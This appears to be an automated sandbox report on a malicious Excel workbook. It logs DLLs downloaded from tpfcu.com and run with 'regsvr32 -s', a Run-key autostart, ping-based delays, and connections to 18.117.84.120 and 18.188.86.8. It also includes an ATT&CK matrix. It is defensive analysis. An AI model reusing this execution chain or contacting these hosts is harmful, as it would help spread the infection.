    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/media/image5.png
    Source: Documents_13134976_1377491379.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\iepfusn.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\iepfusn.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dllJump to dropped file
    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Users\user\AppData\Local\Temp\L3YD7CE.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\iepfusn.dllJump to dropped file

    Boot Survival:

    barindex
    Creates an autostart registry key pointing to binary in C:\WindowsShow sources
    Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSRJump to behavior
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\iepfusn.dllJump to dropped file
    Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSRJump to behavior
    Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSRJump to behavior
    Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Uses ping.exe to sleepShow sources
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2 Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dllJump to dropped file
    Source: C:\Windows\System32\regsvr32.exe TID: 6852Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 5704Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 6880Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 6880Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 6848Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 6816Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 3252Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
    Source: C:\Windows\System32\regsvr32.exeLast function: Thread delayed
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A9D9D GetKeyboardLayoutNameW followed by cmp: cmp ebp, ecx and CTI: je 00007FFD696AA100h5_2_00007FFD696A9D9D
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69649D9D GetKeyboardLayoutNameW followed by cmp: cmp ebp, ecx and CTI: je 00007FFD6964A100h11_2_00007FFD69649D9D
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B3714 FindFirstFileExA,5_2_00007FFD696B3714
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69653714 FindFirstFileExA,11_2_00007FFD69653714
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 30000Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 30000Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 30000Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 60000Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 30000Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 30000Jump to behavior
    Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWt
    Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: regsvr32.exe, 0000001A.00000002.465899187.000000000101D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]]N
    Source: regsvr32.exe, 0000001B.00000002.482209725.0000000000BB8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B31A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD696B31A0
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A4402 GetProcessHeap,HeapAlloc,GetProcessHeap,RtlAllocateHeap,5_2_00007FFD696A4402
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B31A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD696B31A0
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B03CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFD696B03CC
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696AFC50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFD696AFC50
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD696531A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FFD696531A0
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD696503CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FFD696503CC
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD6964FC50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FFD6964FC50

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 18.117.84.120 187Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KRJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DGJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DBJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
    Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B8940 cpuid 5_2_00007FFD696B8940
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B02C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00007FFD696B02C8
    Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Registry Run Keys / Startup Folder11Process Injection112Masquerading111OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution43DLL Side-Loading1Registry Run Keys / Startup Folder11Disable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion11Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion11Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsRemote System Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery24Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 431937 Sample: Documents_13134976_13774913... Startdate: 09/06/2021 Architecture: WINDOWS Score: 100 72 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->72 74 Document exploit detected (drops PE files) 2->74 76 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->76 78 7 other signatures 2->78 13 EXCEL.EXE 32 45 2->13         started        18 regsvr32.exe 2->18         started        20 regsvr32.exe 2->20         started        process3 dnsIp4 66 tpfcu.com 107.180.50.232, 443, 49715 AS-26496-GO-DADDY-COM-LLCUS United States 13->66 68 192.168.2.1 unknown unknown 13->68 56 C:\Users\user\iepfusn.dll, PE32+ 13->56 dropped 58 C:\Users\user\AppData\...\rtdsgfe[1].dll, PE32+ 13->58 dropped 60 C:\...\~$Documents_13134976_1377491379.xlsb, data 13->60 dropped 88 Document exploit detected (creates forbidden files) 13->88 90 Document exploit detected (UrlDownloadToFile) 13->90 22 regsvr32.exe 13->22         started        70 18.117.84.120, 443, 49740, 49747 MIT-GATEWAYSUS United States 18->70 92 System process connects to network (likely due to code injection or exploit) 18->92 file5 signatures6 process7 process8 24 regsvr32.exe 22->24         started        process9 26 cmd.exe 1 24->26         started        dnsIp10 64 8.8.7.7 GOOGLEUS United States 26->64 84 Uses ping.exe to sleep 26->84 86 Uses ping.exe to check the status of other devices and networks 26->86 30 regsvr32.exe 1 26->30         started        33 conhost.exe 26->33         started        35 PING.EXE 1 26->35         started        signatures11 process12 file13 62 C:\Users\user\AppData\Local\...\L3YD7CE.dll, PE32+ 30->62 dropped 37 cmd.exe 1 30->37         started        process14 signatures15 80 Uses ping.exe to sleep 37->80 40 regsvr32.exe 1 37->40         started        43 conhost.exe 37->43         started        45 PING.EXE 1 37->45         started        process16 signatures17 82 Creates an autostart registry key pointing to binary in C:\Windows 40->82 47 cmd.exe 1 40->47         started        process18 signatures19 94 Uses ping.exe to sleep 47->94 50 regsvr32.exe 47->50         started        52 conhost.exe 47->52         started        54 PING.EXE 1 47->54         started        process20

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Documents_13134976_1377491379.xlsb2%ReversingLabs

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll6%MetadefenderBrowse
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll4%ReversingLabs
    C:\Users\user\AppData\Local\Temp\L3YD7CE.dll6%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\L3YD7CE.dll4%ReversingLabs
    C:\Users\user\iepfusn.dll6%MetadefenderBrowse
    C:\Users\user\iepfusn.dll4%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://18.117.84.120/18.188.86.8/0%Avira URL Cloudsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://18.117.84.120/#0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://18.188.86.8/kenichi/special21new/trailer2a50%Avira URL Cloudsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://18.117.84.120/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://18.117.84.120/kenichi/special21new/trailer2a5T00%Avira URL Cloudsafe
    https://18.117.84.120/89b0%Avira URL Cloudsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://18.188.86.8/Z0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://18.117.84.120/kenichi/special21new/trailer2a50%Avira URL Cloudsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://18.188.86.8:443/kenichi/special21new/trailer2a550%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    tpfcu.com
    		107.180.50.232
    		truefalse
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
        		high
        https://login.microsoftonline.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
          		high
          https://shell.suite.office.com:14432CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
            		high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
              		high
              https://autodiscover-s.outlook.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                		high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                  		high
                  https://cdn.entity.2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://api.addins.omex.office.net/appinfo/query2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                    		high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                      		high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                        		high
                        https://powerlift.acompli.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://lookup.onenote.com/lookup/geolocation/v12CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                          		high
                          https://cortana.ai2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                            		high
                            https://cloudfiles.onenote.com/upload.aspx2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                              		high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                		high
                                https://entitlement.diagnosticssdf.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                  		high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                    		high
                                    https://18.117.84.120/18.188.86.8/regsvr32.exe, 00000019.00000002.636067995.00000000029E5000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.aadrm.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://18.117.84.120/#regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
